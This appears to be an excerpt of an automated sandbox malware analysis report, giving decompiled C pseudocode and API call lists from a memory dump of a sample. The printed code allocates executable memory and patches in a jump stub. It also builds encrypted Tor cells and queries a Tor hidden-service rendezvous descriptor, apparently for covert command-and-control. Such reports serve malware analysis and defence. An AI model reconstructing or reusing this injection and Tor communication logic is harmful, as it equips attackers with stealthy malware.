    														goto L21;
    													} else {
    														_push(0x40);
    														_push(0x3000);
    														_push(0x70);
    														_push(0);
    														_push(_t307);
    														E003D1E80();
    														_v8 = _t207;
    														__eflags = _t207;
    														if(_t207 == 0) {
    															goto L21;
    														} else {
    															_t208 = E003C7B30(_t310, _t307, _t207,  &_v136, 0x70);
    															__eflags = _t208;
    															if(_t208 == 0) {
    																goto L21;
    															} else {
    																_t209 = E003C6740(_t310, _t307);
    																__eflags = _t209;
    																if(_t209 == 0) {
    																	goto L21;
    																} else {
    																	__eflags =  *(_t310 + 0x68);
    																	if( *(_t310 + 0x68) == 0) {
    																		_t262 =  *0x3e8628; // 0x622508
    																		_t211 =  *((intOrPtr*)( *((intOrPtr*)(_t262 + 0x64))))(_t307, 0, 0, _t222, _v8, 4, 0);
    																		_a8 = _t211;
    																	} else {
    																		_v18 = _v8;
    																		_v12 = _t222 - _t209 - 0xc;
    																		_v20 = 0x6858;
    																		_v14 = 0xe950;
    																		_t211 = E003C7B30(_t310, _t307, _t209,  &_v20, 0xc);
    																	}
    																	__eflags = _t211;
    																	if(_t211 == 0) {
    																		goto L21;
    																	} else {
    																		_t87 = _t310 + 0x84; // 0xc8
    																		_t263 =  *0x3e8628; // 0x622508
    																		 *((intOrPtr*)( *((intOrPtr*)(_t263 + 0x80))))( *_t87);
    																		_t89 = _t310 + 0x80; // 0x828b003e
    																		_t264 =  *0x3e8628; // 0x622508
    																		 *((intOrPtr*)( *((intOrPtr*)(_t264 + 0x80))))( *_t89);
    																		_t265 =  *0x3e8628; // 0x622508
    																		_t217 =  *((intOrPtr*)( *((intOrPtr*)(_t265 + 0x94))))(_a8);
    																		__eflags = _t217;
    																		if(_t217 == 0) {
    																			goto L21;
    																		} else {
    																			_t218 = E003CE730(_t310);
    																			__eflags = _t218;
    																			if(_t218 == 0) {
    																				goto L21;
    																			} else {
    																				 *(_t310 + 0x90) = _t222;
    																				 *(_t310 + 0x8c) = _v8;
    																				_t224 = _t222 - E003CE8B0 + E003CEA20;
    																				__eflags = _t224;
    																				 *(_t310 + 0x94) = _t224;
    																				 *((intOrPtr*)(_t310 + 0x6c)) = 1;
    																				return 1;
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								}
    							}
    						}
    					}
    				} else {
    					return 0;
    				}
    			}

    APIs
    • memset.MSVCRT ref: 003CDFDC
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE171
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE199
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE1C1
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE1E9
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE211
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE239
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE261
    • GetProcAddress.KERNEL32(003CC9A1,?), ref: 003CE289
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 76%
    			E003D4BDF(intOrPtr _a4, intOrPtr* _a8, intOrPtr _a12, intOrPtr _a16) {
    				char* _v8;
    				signed int _v12;
    				intOrPtr _v16;
    				intOrPtr _v52;
    				intOrPtr _v56;
    				intOrPtr _v60;
    				intOrPtr _v64;
    				int _v68;
    				void _v72;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				char* _t53;
    				intOrPtr* _t55;
    				void* _t57;
    				void* _t62;
    				void* _t77;
    				void* _t78;
    				intOrPtr _t82;
    				void* _t90;
    				intOrPtr _t106;
    				int _t111;
    				char* _t112;
    				intOrPtr _t113;
    				void* _t118;
    				void* _t119;
    				void* _t120;
    				void* _t123;
    
    				_t53 =  *0x3e8538(0x400);
    				_v8 = _t53;
    				_v16 =  *0x3e8538(0x400);
    				_t55 = _a8;
    				_t90 = _t55 + 1;
    				do {
    					_t106 =  *_t55;
    					_t55 = _t55 + 1;
    				} while (_t106 != 0);
    				_t57 = E003D463A(_a4, 0, _a8, _t55 - _t90);
    				_t119 = _t118 + 0xc;
    				if(_t57 == 0) {
    					L7:
    					_t111 = 0;
    				} else {
    					memset(_v8, 0, 0x400);
    					_t120 = _t119 + 0xc;
    					_v12 = _v12 & 0x00000000;
    					while(1) {
    						_t85 = _a4;
    						_t62 = E003D48F6(_a4, 0,  &(_v8[_v12]), 1);
    						_t120 = _t120 + 0xc;
    						if(_t62 == 0) {
    							goto L7;
    						}
    						if(strstr(_v8, 0x3e667c) != 0) {
    							if(strstr(_v8, "200 OK") == 0) {
    								goto L7;
    							} else {
    								if(strstr(_v8, "Content-Encoding: deflate") == 0) {
    									_t112 = "Content-Length: ";
    									if(strstr(_v8, _t112) == 0) {
    										goto L7;
    									} else {
    										_v12 = _v12 & 0x00000000;
    										sscanf( &((strstr(_v8, _t112))[0x10]), "%d\r\n",  &_v12);
    										if(_v12 == 0) {
    											goto L7;
    										} else {
    											_t113 = _a12;
    											if(E003D48F6(_t85, 0, _t113, _v12) == 0) {
    												goto L7;
    											} else {
    												 *((char*)(_v12 + _t113)) = 0;
    												goto L26;
    											}
    										}
    									}
    								} else {
    									memset( &_v72, 0, 0x38);
    									_v72 = _v16;
    									_v68 = 0;
    									_v60 = _a12;
    									_v56 = 0x400000;
    									E003D2307( &_v72);
    									_t87 = _a4;
    									_t77 = E003D48F6(_a4, 0, _v16, 1);
    									_t123 = _t120 + 0x18;
    									while(_t77 != 0) {
    										if(_v68 == 0) {
    											_v72 = _v16;
    											_v68 = 1;
    										}
    										_t78 = E003D238B( &_v72);
    										if(_t78 == 1) {
    											L21:
    											 *((char*)(_v52 + _a12)) = 0;
    											E003D255C( &_v72);
    											L26:
    											_t111 = 1;
    										} else {
    											if(_t78 != 0) {
    												E003D255C( &_v72);
    												goto L7;
    											} else {
    												_t82 = _a16;
    												if(_t82 == 0 || _v64 < _t82) {
    													_t77 = E003D48F6(_t87, 0, _v16, 1);
    													_t123 = _t123 + 0xc;
    													continue;
    												} else {
    													goto L21;
    												}
    											}
    										}
    										goto L27;
    									}
    									goto L7;
    								}
    							}
    						} else {
    							_v12 = _v12 + 1;
    							if(_v12 < 0x400) {
    								continue;
    							} else {
    								goto L7;
    							}
    						}
    						goto L27;
    					}
    					goto L7;
    				}
    				L27:
    				 *0x3e8540(_v16);
    				 *0x3e8540(_v8);
    				return _t111;
    			}

    APIs
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D46EE
      • Part of subcall function 003D463A: htons.WS2_32(?), ref: 003D4701
      • Part of subcall function 003D463A: htons.WS2_32( L=), ref: 003D472A
      • Part of subcall function 003D463A: memcpy.MSVCRT ref: 003D473E
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D481C
      • Part of subcall function 003D463A: memset.MSVCRT ref: 003D4845
      • Part of subcall function 003D463A: htons.WS2_32(?), ref: 003D487F
    • memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4939
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4955
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4964
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D497C
      • Part of subcall function 003D48F6: htons.WS2_32(?), ref: 003D4B37
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B5F
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B75
      • Part of subcall function 003D48F6: memcpy.MSVCRT ref: 003D4B9A
    • strstr.MSVCRT ref: 003D4C61
    • strstr.MSVCRT ref: 003D4C80
    • strstr.MSVCRT ref: 003D4C90
    • memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D238B: memcpy.MSVCRT ref: 003D2415
      • Part of subcall function 003D238B: memcpy.MSVCRT ref: 003D24E1
    • strstr.MSVCRT ref: 003D4D4B
    • strstr.MSVCRT ref: 003D4D68
    • sscanf.MSVCRT ref: 003D4D70
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 32%
    			E003D463A(intOrPtr* __ebx, void* _a4, void* _a8, signed int _a12) {
    				void* _v8;
    				int _v12;
    				void* _v16;
    				void* _v20;
    				signed int _v24;
    				intOrPtr _v28;
    				signed int _v32;
    				intOrPtr _v36;
    				void _v56;
    				void _v172;
    				intOrPtr _t99;
    				void* _t103;
    				void* _t104;
    				signed int _t106;
    				signed int _t107;
    				void* _t125;
    				signed int _t128;
    				void* _t129;
    				signed int _t132;
    				signed int _t133;
    				void* _t140;
    				void* _t144;
    				intOrPtr* _t148;
    				signed int _t156;
    				signed int* _t163;
    				signed int _t164;
    				signed int _t166;
    				signed int _t170;
    				void* _t178;
    				void* _t185;
    				intOrPtr _t192;
    				void* _t194;
    				void* _t195;
    				int _t196;
    				void* _t198;
    				void* _t200;
    				void* _t201;
    				void* _t202;
    				void* _t204;
    				void* _t205;
    				void* _t206;
    				void* _t207;
    
    				_t148 = __ebx;
    				_t178 =  *0x3e8538(0x200);
    				_v16 = _t178;
    				_v8 =  *0x3e8538(0x200);
    				_v24 = _v24 & 0x00000000;
    				_v32 = _v32 & 0x00000000;
    				_t99 = _a12 / 0x1f2 + 1;
    				_v36 = _t99;
    				if(_t99 == 0) {
    					L24:
    					 *0x3e8540(_t178);
    					 *0x3e8540(_v8);
    					_t103 = 1;
    				} else {
    					_t104 = _a8;
    					_v28 = 0x1f2;
    					_v28 = _v28 - _t104;
    					_v20 = _t104;
    					do {
    						_t19 =  &_a4; // 0x3d4c20
    						_t192 =  *_t19;
    						if(_t192 == 0) {
    							L9:
    							memset(_t178, 0, 0x1fd);
    							 *_t178 = 2;
    							_t106 =  *(_t148 + 0x138) & 0x0000ffff;
    							_t201 = _t200 + 0xc;
    							__imp__#9(_t106);
    							 *(_t178 + 3) = _t106;
    							_t107 = _a12;
    							if(_v20 + _v28 >= _t107) {
    								_t107 = _t107 - _v24;
    								_v12 = _t107;
    							} else {
    								_v12 = 0x1f2;
    							}
    							_t38 =  &_v12; // 0x3d4c20
    							__imp__#9( *_t38);
    							 *(_t178 + 9) = _t107;
    							_t42 = _t178 + 0xb; // 0xb
    							memcpy(_t42, _v20, _v12);
    							_t202 = _t201 + 0xc;
    							_push(0x1fd);
    							_push(_t178);
    							if(_a4 == 0) {
    								 *0x3e899c(_t148 + 8);
    								_t194 = _t148 + 8;
    							} else {
    								 *0x3e899c(_a4);
    								_t194 = _a4;
    							}
    							_t156 = 0x1d;
    							memcpy( &_v172, _t194, _t156 << 2);
    							_t195 =  *0x3e8538(0x14);
    							_v12 = _t195;
    							 *0x3e8ab0( &_v172, _t195);
    							memcpy( &_v56, _t195, 0 << 2);
    							_t204 = _t202 + 0x18;
    							 *0x3e8540(_v12, 5);
    							_t185 = _a4;
    							_t118 = _v16;
    							 *((intOrPtr*)(_v16 + 5)) = _v56;
    							if(_t185 == 0) {
    								_t196 = 0x200;
    								memset(_v8, 0, 0x200);
    								_t125 = E003D3BB7(_t148 + 0xf0, _v16, 0x1fd, _v8 + 3, _t148 + 0x110, _t148 + 0x120);
    								_t205 = _t204 + 0x24;
    								if(_t125 == 0) {
    									goto L26;
    								} else {
    									goto L20;
    								}
    							} else {
    								_t59 = _t185 + 0x118; // 0x118
    								_t60 = _t185 + 0x108; // 0x108
    								_t140 = E003D3BB7(_t185 + 0xe8, _t118, 0x1fd, _v8, _t60, _t59);
    								_t206 = _t204 + 0x18;
    								if(_t140 == 0) {
    									L26:
    									_t178 = _v16;
    									goto L27;
    								} else {
    									_t144 = E003D3BB7(_t148 + 0xf0, _v8, 0x1fd, _v16, _t148 + 0x110, _t148 + 0x120);
    									_t207 = _t206 + 0x18;
    									if(_t144 == 0) {
    										goto L26;
    									} else {
    										_t198 = _v8;
    										memset(_t198, 0, 0x200);
    										_t170 = 0x7f;
    										memcpy(_t198 + 3, _v16, _t170 << 2);
    										_t205 = _t207 + 0x18;
    										asm("movsb");
    										_t185 = _a4;
    										_t196 = 0x200;
    										L20:
    										_t128 =  *(_t148 + 4) & 0x0000ffff;
    										__imp__#9(_t128);
    										_t163 = _v8;
    										 *_t163 = _t128;
    										_t163[0] = 3;
    										_t129 = E003DFD0B( *_t148, _t163, _t196);
    										_t200 = _t205 + 0xc;
    										if(_t129 != _t196) {
    											goto L26;
    										} else {
    											goto L21;
    										}
    									}
    								}
    							}
    						} else {
    							_t132 =  *(_t192 + 0x134);
    							if(_t132 < 0x3e8) {
    								L6:
    								_t133 =  *(_t192 + 0x134);
    								if(_t133 < 0x1f4) {
    									goto L9;
    								} else {
    									_t164 = 0x32;
    									if(_t133 % _t164 != 0 || E003D4573(_t148, _t192) != 0) {
    										goto L9;
    									} else {
    										goto L27;
    									}
    								}
    							} else {
    								_t166 = 0x64;
    								if(_t132 % _t166 != 0 || E003D4573(_t148, _t192) != 0) {
    									goto L6;
    								} else {
    									L27:
    									 *0x3e8540(_t178);
    									 *0x3e8540(_v8);
    									_t103 = 0;
    								}
    							}
    						}
    						goto L25;
    						L21:
    						_v24 = _v24 + 0x1f2;
    						_v20 = _v20 + 0x1f2;
    						if(_t185 != 0) {
    							 *((intOrPtr*)(_t185 + 0x134)) =  *((intOrPtr*)(_t185 + 0x134)) + 1;
    						}
    						_v32 = _v32 + 1;
    						_t178 = _v16;
    					} while (_v32 < _v36);
    					goto L24;
    				}
    				L25:
    				return _t103;
    			}

    APIs
    • memset.MSVCRT ref: 003D46EE
    • htons.WS2_32(?), ref: 003D4701
    • htons.WS2_32( L=), ref: 003D472A
    • memcpy.MSVCRT ref: 003D473E
    • memset.MSVCRT ref: 003D481C
    • memset.MSVCRT ref: 003D4845
      • Part of subcall function 003D3BB7: CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,000001FD,?,?,?,?,00000000,00000200), ref: 003D3BCF
      • Part of subcall function 003D3BB7: CryptEncrypt.ADVAPI32(?,00000000,00000001,00000000,?,?,00000020), ref: 003D3C60
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3C71
      • Part of subcall function 003D3BB7: CryptImportKey.ADVAPI32(?,00000000,0000001C,00000000,00000000,?), ref: 003D3D87
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DD2
      • Part of subcall function 003D3BB7: CryptDestroyKey.ADVAPI32(?), ref: 003D3DF2
      • Part of subcall function 003D3BB7: CryptReleaseContext.ADVAPI32(?,00000000), ref: 003D3DFD
    • htons.WS2_32(?), ref: 003D487F
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFDE5
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFDF7
      • Part of subcall function 003DFD0B: memcpy.MSVCRT ref: 003DFE15
      • Part of subcall function 003DFD0B: memset.MSVCRT ref: 003DFE5E
      • Part of subcall function 003DFD0B: htons.WS2_32(00000301), ref: 003DFEB9
      • Part of subcall function 003DFD0B: htons.WS2_32(?), ref: 003DFEC2
      • Part of subcall function 003DFD0B: send.WS2_32(?,?,?,00000000), ref: 003DFED4
    Strings
    Memory Dump Source
    • Source File: 00000002.00000002.12939612937.003C1000.00000020.sdmp, Offset: 003C0000, based on PE: true
    • Associated: 00000002.00000002.12939589140.003C0000.00000002.sdmp
    • Associated: 00000002.00000002.12939651346.003E3000.00000002.sdmp
    • Associated: 00000002.00000002.12939666750.003E8000.00000004.sdmp
    • Associated: 00000002.00000002.12939674053.003E9000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_2_2_3c0000_ucE7u0vttK.jbxd
    C-Code - Quality: 43%
    			E003D5C47(void* __edx, void* __eflags, intOrPtr _a4) {
    				char _v504;
    				char _v512;
    				char _v532;
    				int _v1364;
    				void* _v2164;
    				char _v2180;
    				char _v2284;
    				intOrPtr _v2316;
    				void _v2400;
    				void _v2420;
    				char _v2424;
    				char _v2440;
    				char _v2456;
    				intOrPtr _v2460;
    				void _v2488;
    				char _v2496;
    				void _v2508;
    				intOrPtr _v2516;
    				char _v2528;
    				char _v2532;
    				intOrPtr _v2540;
    				char _v2544;
    				void _v2552;
    				void* _v2556;
    				signed int _v2560;
    				intOrPtr _v2564;
    				char* _v2568;
    				void* _v2572;
    				char* _v2576;
    				intOrPtr _v2580;
    				void* _v2584;
    				signed int _v2588;
    				void* _v2592;
    				void* _v2596;
    				char _v2600;
    				intOrPtr _v2604;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t129;
    				signed int _t132;
    				intOrPtr _t133;
    				intOrPtr _t134;
    				void* _t135;
    				char* _t136;
    				void* _t150;
    				void* _t156;
    				char _t160;
    				void* _t161;
    				intOrPtr* _t167;
    				int _t171;
    				int _t175;
    				signed int _t176;
    				int _t188;
    				int _t189;
    				int _t194;
    				int _t195;
    				void* _t197;
    				intOrPtr _t203;
    				int _t207;
    				int _t213;
    				int _t222;
    				int _t226;
    				int _t232;
    				int _t234;
    				void* _t245;
    				void* _t249;
    				void* _t251;
    				void* _t257;
    				void* _t271;
    				signed int _t272;
    				void* _t278;
    				void* _t279;
    				void* _t281;
    				signed int _t285;
    				signed int _t288;
    				int _t310;
    				signed int _t312;
    				void* _t313;
    				intOrPtr _t318;
    				int _t323;
    				char* _t337;
    				void* _t338;
    				intOrPtr _t342;
    				intOrPtr* _t347;
    				int _t349;
    				int _t350;
    				int _t353;
    				intOrPtr* _t358;
    				signed int _t359;
    				void* _t362;
    				void* _t363;
    				void* _t364;
    				void* _t365;
    				void* _t366;
    
    				_t129 =  *0x3e8538(0x470, _t313, _t338, _t245);
    				_v2572 = _t129;
    				memset(_t129, 0, 0x470);
    				_t362 = (_t359 & 0xfffffff8) - 0xa14 + 0xc;
    				_v2552 =  *0x3e8538(0x200);
    				_v2600 = 0x10000;
    				_t132 =  *0x3e8538();
    				_v2560 = _t132;
    				_t133 =  *0x3e8538(0x1000);
    				_v2580 = _t133;
    				_t134 =  *0x3e8538(0x1000);
    				_v2540 = _t134;
    				_t135 =  *0x3e8538(0x28);
    				_v2556 = _t135;
    				_t136 =  *0x3e8538();
    				_t257 = 0x80;
    				_v2568 = _t136;
    				if(E003D50D5(_a4,  &_v2440, E003DE937(_t257) & 1) == 0 || E003D39C0( &_v2528,  &_v2440) != 0x14) {
    					L33:
    					 *0x3e8540(_v2556);
    					 *0x3e8540(_v2568);
    					 *0x3e8540(_v2560);
    					 *0x3e8540(_v2552);
    					 *0x3e8540(_v2540);
    					 *0x3e8540(_v2580);
    					 *0x3e8540(_v2572);
    					_t150 = 0;
    				} else {
    					_t156 = E003D51F8( &_v2284,  &_v2528);
    					_t379 = _t156;
    					if(_t156 == 0) {
    						goto L33;
    					} else {
    						E003D3E17( &_v2164);
    						_t160 = L003DF529(_t379,  &_v2284);
    						_pop(_t271);
    						_v2164 = _t160;
    						_t380 = _t160;
    						if(_t160 == 0) {
    							goto L33;
    						} else {
    							_t161 = E003D4054( &_v2164, _t380);
    							_t381 = _t161;
    							if(_t161 == 0 || E003D3EE9( &_v2164, _t271, _t381) == 0) {
    								_t342 = _v2164;
    								goto L8;
    							} else {
    								_t167 = _v2164;
    								_v2532 = 0x10;
    								__imp__#5( *_t167,  &_v2508,  &_v2532);
    								__imp__#12(_v2516);
    								sprintf(_v2568, "GET /tor/rendezvous2/%s HTTP/1.0\r\nHost: %s\r\n\r\n",  &_v2456, _t167);
    								_t171 = E003D4BDF( &_v2180, _v2568, _v2576, 0);
    								_t342 = _v2180;
    								_t363 = _t362 + 0x20;
    								__eflags = _t171;
    								if(_t171 != 0) {
    									E003DFF10(_t342);
    									_t175 = E003D528D( &_v532,  &_v2560, _v2576);
    									_t364 = _t363 + 0xc;
    									__eflags = _t175;
    									if(_t175 == 0) {
    										goto L33;
    									} else {
    										_t176 = E003DE937(_t271);
    										_t272 = 8;
    										_t310 = _t176 % _v2560 << 5;
    										__eflags = _t310;
    										memcpy( &_v2488, _t364 + _t310 + 0x820, _t272 << 2);
    										_t365 = _t364 + 0xc;
    										_t318 =  *0x3e8ac0; // 0x0
    										do {
    											_t312 = E003DE937(0) %  *0x3e8ac4;
    											__eflags =  *((intOrPtr*)(_t312 * 0x74 + _t318 + 0x70)) - 1;
    										} while (__eflags != 0);
    										_push(0x1d);
    										memcpy( &_v2420, _t312 * 0x74 + _t318, 0 << 2);
    										_t366 = _t365 + 0xc;
    										__eflags = E003D556B(0,  &_v2420, __eflags);
    										if(__eflags == 0) {
    											L30:
    											_t323 = _v2560;
    											__eflags = _t323;
    											if(_t323 > 0) {
    												_t347 =  &_v504;
    												do {
    													 *0x3e8540( *((intOrPtr*)(_t347 - 4)));
    													 *0x3e8540( *_t347);
    													_t347 = _t347 + 0x20;
    													_t323 = _t323 - 1;
    													__eflags = _t323;
    												} while (_t323 != 0);
    											}
    											goto L33;
    										} else {
    											_t188 = L003DF529(__eflags,  &_v2420);
    											_t324 = _v2588;
    											_pop(_t278);
    											 *_v2588 = _t188;
    											__eflags = _t188;
    											if(__eflags == 0) {
    												goto L30;
    											} else {
    												_t189 = E003D4054(_t324, __eflags);
    												__eflags = _t189;
    												if(_t189 == 0) {
    													L29:
    													E003DFF10( *_t324);
    													goto L30;
    												} else {
    													_t349 = 0;
    													__eflags = 0;
    													do {
    														 *((char*)(_t366 + _t349 + 0x44)) = E003DE8E0();
    														_t349 = _t349 + 1;
    														__eflags = _t349 - 0x14;
    													} while (__eflags < 0);
    													_t194 = E003D56CF(_t324, _t278, __eflags,  &_v2544);
    													_pop(_t279);
    													__eflags = _t194;
    													if(__eflags == 0) {
    														goto L29;
    													} else {
    														_t195 = E003DF29F(_t279, __eflags, _v2572, _v2584);
    														_pop(_t281);
    														__eflags = _t195;
    														if(_t195 == 0) {
    															goto L29;
    														} else {
    															_t249 = _v2556;
    															_t350 = E003D5853(_t281, _v2460, _t249);
    															_v2552 = _t350;
    															__eflags = _t350;
    															if(__eflags == 0) {
    																goto L29;
    															} else {
    																_t197 =  *0x3e8538(_t350);
    																_v2592 = _t197;
    																memcpy(_t197, _t249, _t350);
    																E003D3B5C(_v2592, _t350,  &_v2508);
    																_t285 = 5;
    																memcpy(_v2596,  &_v2508, _t285 << 2);
    																 *_t249 = 3;
    																_t203 = E003D3B23(__eflags) + 0x96;
    																__imp__#8(_t203);
    																 *((intOrPtr*)(_t249 + 2)) = _t203;
    																_t207 = E003DEA68( &_v2424,  &_v2568,  &_v2584);
    																__eflags = _t207;
    																if(_t207 == 0) {
    																	L28:
    																	 *0x3e8540(_v2596);
    																	_t324 = _v2592;
    																	goto L29;
    																} else {
    																	 *((intOrPtr*)(_t249 + 6)) = _v2568;
    																	 *((short*)(_t249 + 0xa)) = _v2584;
    																	_t288 = 5;
    																	memcpy(_t249 + 0xc,  &_v2400, _t288 << 2);
    																	_t213 = E003D5853(0, _v2316, _t249 + 0x22);
    																	_t353 = _t213;
    																	_v2568 = _t353;
    																	__eflags = _t353;
    																	if(_t353 == 0) {
    																		goto L28;
    																	} else {
    																		__imp__#9(_t353);
    																		 *(_t249 + 0x20) = _t213;
    																		_push(5);
    																		_v2588 = _v2588 & 0x00000000;
    																		_t85 = _t249 + _t353 + 0x22; // 0x22
    																		_push(0x20);
    																		_t89 = memcpy(_t85,  &_v2552, 0 << 2) + 0x36; // 0x36
    																		memcpy(_t89, _v2592, 0 << 2);
    																		_t222 = E003D588E(_t249, _v2572 + 0xb6, _v2600, _v2560, _v2604 + 0x14,  &_v2588);
    																		__eflags = _t222;
    																		if(_t222 == 0) {
    																			goto L28;
    																		} else {
    																			E003D3E17( &_v1364);
    																			_t226 = L003DF529(__eflags,  &_v2496);
    																			_v1364 = _t226;
    																			__eflags = _t226;
    																			if(__eflags == 0) {
    																				goto L28;
    																			} else {
    																				__eflags = E003D4054( &_v1364, __eflags);
    																				if(__eflags == 0) {
    																					L27:
    																					E003DFF10(_v1364);
    																					goto L28;
    																				} else {
    																					_t232 = E003D5949( &_v1364, __eflags, _v2604, _v2588 + 0x14);
    																					__eflags = _t232;
    																					if(_t232 == 0) {
    																						goto L27;
    																					} else {
    																						_t251 = _v2596;
    																						_t234 = E003D5AAA(_t251, _v2580, _t251 + 0x338);
    																						__eflags = _t234;
    																						if(_t234 != 0) {
    																							E003DFF10(_v1364);
    																							 *0x3e8540(_v2600);
    																							_t337 = _v2568;
    																							__eflags = _t337;
    																							if(_t337 > 0) {
    																								_t358 =  &_v512;
    																								do {
    																									 *0x3e8540( *((intOrPtr*)(_t358 - 4)));
    																									 *0x3e8540( *_t358);
    																									_t358 = _t358 + 0x20;
    																									_t337 = _t337 - 1;
    																									__eflags = _t337;
    																								} while (_t337 != 0);
    																							}
    																							 *0x3e8540(_v2580);
    																							 *0x3e8540(_v2592);
    																							 *0x3e8540(_v2584);
    																							 *0x3e8540(_v2576);
    																							 *0x3e8540(_v2564);
    																							 *0x3e8540(_v2604);
    																							_t150 = _t251;
    																						} else {
    																							goto L27;
    																						}
    																					}
    																				}
    																			}
    																		}
    																	}
    																}
    															}
    														}
    													}
    												}
    											}
    										}
    									}
    								} else {
    									L8:
    									E003DFF10(_t342);
    									goto L33;
    								}
    							}
    						}
    					}
    				}
    				return _t150;
    			}

    APIs
    • memset.MSVCRT ref: 003D5C6B
      • Part of subcall function 003D50D5: htonl.WS2_32(?), ref: 003D513C
      • Part of subcall function 003D39C0: memset.MSVCRT ref: 003D39EE
    • getpeername.WS2_32(?), ref: 003D5D94
    • inet_ntoa.WS2_32(?), ref: 003D5D9E
    • sprintf.MSVCRT ref: 003D5DB6
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4C2D
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C61
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C80
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4C90
      • Part of subcall function 003D4BDF: memset.MSVCRT ref: 003D4CA5
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D4B
      • Part of subcall function 003D4BDF: strstr.MSVCRT ref: 003D4D68
      • Part of subcall function 003D4BDF: sscanf.MSVCRT ref: 003D4D70
      • Part of subcall function 003DFF10: closesocket.WS2_32(?), ref: 003DFF12
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D40B3
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4122
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4165
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D41AC
      • Part of subcall function 003D4054: htonl.WS2_32(00000000), ref: 003D41C5
      • Part of subcall function 003D4054: getpeername.WS2_32(?,?,?), ref: 003D41EA
      • Part of subcall function 003D4054: memset.MSVCRT ref: 003D4226
      • Part of subcall function 003D4054: htons.WS2_32(?), ref: 003D4233
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F19
      • Part of subcall function 003D3EE9: htons.WS2_32(00000000), ref: 003D3F31
      • Part of subcall function 003D3EE9: memset.MSVCRT ref: 003D3F7B
      • Part of subcall function 003D3EE9: htons.WS2_32(?), ref: 003D3FB2
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52A3
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52B8
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D52C4
      • Part of subcall function 003D528D: memcpy.MSVCRT ref: 003D52F9
      • Part of subcall function 003D528D: memset.MSVCRT ref: 003D5319
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D5343
      • Part of subcall function 003D528D: strstr.MSVCRT ref: 003D536D
      • Part of subcall function 003D528D: memset.MSVCRT ref: 003D538C
      • Part of subcall function 003D528D: memcpy.MSVCRT ref: 003D53A3
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D5444
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D544C
      • Part of subcall function 003D528D: sscanf.MSVCRT ref: 003D5468
      • Part of subcall function 003D528D: sscanf.MSVCRT ref: 003D5485
      • Part of subcall function 003D528D: strtok.MSVCRT ref: 003D54E6
      • Part of subcall function 003D556B: getpeername.WS2_32(?,?,?), ref: 003D55D6
      • Part of subcall function 003D556B: inet_ntoa.WS2_32(?), ref: 003D55FE
      • Part of subcall function 003D556B: sprintf.MSVCRT ref: 003D5611
      • Part of subcall function 003D556B: strstr.MSVCRT ref: 003D5640
      • Part of subcall function 003D556B: strstr.MSVCRT ref: 003D5652
      • Part of subcall function 003D556B: memset.MSVCRT ref: 003D568F
      • Part of subcall function 003D556B: memcpy.MSVCRT ref: 003D56A1
      • Part of subcall function 003D56CF: memset.MSVCRT ref: 003D5700
      • Part of subcall function 003D56CF: htons.WS2_32(00000000), ref: 003D571E
      • Part of subcall function 003D56CF: htons.WS2_32(00000014), ref: 003D5726
      • Part of subcall function 003D56CF: memset.MSVCRT ref: 003D577A
